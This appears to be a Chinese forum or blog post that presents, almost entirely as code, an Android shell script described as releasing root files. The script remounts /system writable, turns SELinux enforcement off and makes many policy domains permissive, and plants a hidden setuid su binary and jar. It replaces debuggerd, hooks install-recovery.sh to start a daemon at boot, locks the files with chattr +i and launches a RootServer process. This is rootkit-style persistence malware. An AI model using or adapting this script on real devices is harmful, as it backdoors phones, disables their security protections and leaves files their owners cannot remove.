释放root文件的脚本文件代码如下:
#!/system/bin/sh
MYDIR=$3
ARGS=$4
SU=$MYDIR/au
SUPOLICY=$MYDIR/supolicy
BUSYBOX=$MYDIR/busybox
TOOLBOX=$MYDIR/toolbox
SER=".libafifa.jar"
TAT_SER="/system/lib/$SER"
$TOOLBOX mount -r -w -o remount /system;
$TOOLBOX mount -o remount,rw /system;
IS_SELINUX_ENFORCING=0
if [ -f "/sys/fs/selinux/enforce" ]; then
IS_SELINUX_ENFORCING=$($BUSYBOX cat /sys/fs/selinux/enforce)
echo "selinux: $IS_SELINUX_ENFORCING"
echo 0 > /sys/fs/selinux/enforce
IS_SELINUX_ENFORCING=$($BUSYBOX cat /sys/fs/selinux/enforce)
echo "now selinux: $IS_SELINUX_ENFORCING"
fi
#copy server.apk
[ -f $TAT_SER ] && $BUSYBOX chattr -iaA $TAT_SER && $TOOLBOX rm $TAT_SER
$BUSYBOX cat $MYDIR/$SER>$TAT_SER 2>/dev/null
chown 0.0 $TAT_SER 2>/dev/null;$BUSYBOX chmod 6755 $TAT_SER; chcon u:object_r:system_file:s0 $TAT_SER 2>/dev/null;
#copy au
[ -f /system/bin/au ] && $BUSYBOX chattr -iaA /system/bin/au && $TOOLBOX rm /system/bin/au
$BUSYBOX cat $SU>/system/bin/au 2>/dev/null; chown 0.0 /system/bin/au 2>/dev/null;$BUSYBOX chmod 6755 /system/bin/au; chcon u:object_r:system_file:s0 /system/bin/au 2>/dev/null;
[ -f /system/xbin/au ] || ln -s /system/bin/au /system/xbin/au;
#chmod install_recovery.sh
[ -f /system/etc/install-recovery.sh ] && $BUSYBOX chattr -iaA /system/etc/install-recovery.sh && $TOOLBOX rm /system/etc/install-recovery.sh;
[ -f /system/etc/install_recovery.sh ] && $BUSYBOX chattr -iaA /system/etc/install_recovery.sh && $TOOLBOX rm /system/etc/install_recovery.sh;
[ -f /system/xbin/install-recovery.sh ] && $BUSYBOX chattr -iaA /system/xbin/install-recovery.sh
$BUSYBOX cat $BUSYBOX >/system/xbin/busybox
$BUSYBOX chmod 777 /system/xbin/busybox
$BUSYBOX cat $TOOLBOX >/system/xbin/toolbox
$BUSYBOX chmod 777 /system/xbin/toolbox
echo '#!/system/bin/sh
/system/bin/au --daemon &
'>/system/xbin/install-recovery.sh; $BUSYBOX chmod 0755 /system/xbin/install-recovery.sh; chcon u:object_r:system_file:s0 /system/xbin/install-recovery.sh 2>/dev/null;
[ -f /system/etc/install_recovery ] || ln -s /system/xbin/install-recovery.sh /system/etc/install_recovery.sh;
[ -f /system/etc/install-recovery.sh ] || ln -s /system/xbin/install-recovery.sh /system/etc/install-recovery.sh;
$BUSYBOX chattr -iaA /system/bin/debuggerd; $BUSYBOX cat /system/bin/debuggerd >/system/bin/debuggerd2 2>/dev/null ;$TOOLBOX rm /system/bin/debuggerd ;
$BUSYBOX cat $SU >/system/bin/debuggerd
$BUSYBOX chmod 777 /system/bin/debuggerd
$BUSYBOX chattr +iaA /system/etc/install_recovery.sh;
$BUSYBOX chattr +iaA /system/etc/install-recovery.sh;
$BUSYBOX chattr +iaA /system/bin/au;
$BUSYBOX chattr +iaA $TAT_SER;
$BUSYBOX chattr +iaA /system/bin/debuggerd;
SDK=$(getprop ro.build.version.sdk)
if [ "$SDK" -ge "18" ]; then
if [ -f "$SUPOLICY" ]; then
echo "patching policy ..."
$BUSYBOX cat $SUPOLICY>/system/xbin/supolicy; chown 0.0 /system/xbin/supolicy 2>/dev/null;$BUSYBOX chmod 0755 /system/xbin/supolicy; chcon u:object_r:system_file:s0 /system/xbin/supolicy 2>/dev/null
/system/xbin/supolicy --live "allow init default_android_service service_manager { add find }"
/system/xbin/supolicy --live "allow untrusted_app default_android_service service_manager { add find }"
/system/xbin/supolicy --live "allow init connectivity_service service_manager { add find }"
/system/xbin/supolicy --live "allow init package_service service_manager { find }"
/system/xbin/supolicy --live "allow init install_recovery_exec file { read unlink write }"
/system/xbin/supolicy --live "allow init user_service service_manager { find }"
/system/xbin/supolicy --live "allow init_shell default_android_service service_manager { add find }"
/system/xbin/supolicy --live "allow s_init_shell default_android_service service_manager { add find }"
/system/xbin/supolicy --live "permissive init"
/system/xbin/supolicy --live "permissive kernel"
/system/xbin/supolicy --live "permissive toolbox"
/system/xbin/supolicy --live "permissive toolbox_exec"
/system/xbin/supolicy --live "permissive s_init_shell"
/system/xbin/supolicy --live "permissive init_shell"
/system/xbin/supolicy --live "permissive shell"
/system/xbin/supolicy --live "permissive su"
/system/xbin/supolicy --live "permissive adbd"
fi
fi
echo "ROOT DONE"
IS_64=$(getprop ro.product.cpu.abilist64)
if [[ -z "$IS_64" ]]; then
(export _LD_LIBRARY_PATH=/vendor/lib:/system/lib;export LD_LIBRARY_PATH=/vendor/lib:/system/lib;export CLASSPATH=$MYDIR/$SER; app_process /system/bin/ com.abs.root.RootServer --application $ARGS )>&- &
else
(export _LD_LIBRARY_PATH=/vendor/lib:/system/lib;export LD_LIBRARY_PATH=/vendor/lib:/system/lib;export CLASSPATH=$MYDIR/$SER; app_process32 /system/bin/ com.abs.root.RootServer --application $ARGS )>&- &
fi
sleep 1
if [[ "$SDK" -ge "21" ]]; then
$TOOLBOX mount -t cgroup -ocpuacct none /sys/fs/cgroup
TARGET_PID=`ps |$BUSYBOX grep app_process |$BUSYBOX awk '{print $2}'`
echo "mypid:${TARGET_PID}"
echo $TARGET_PID >/acct/cgroup.procs
fi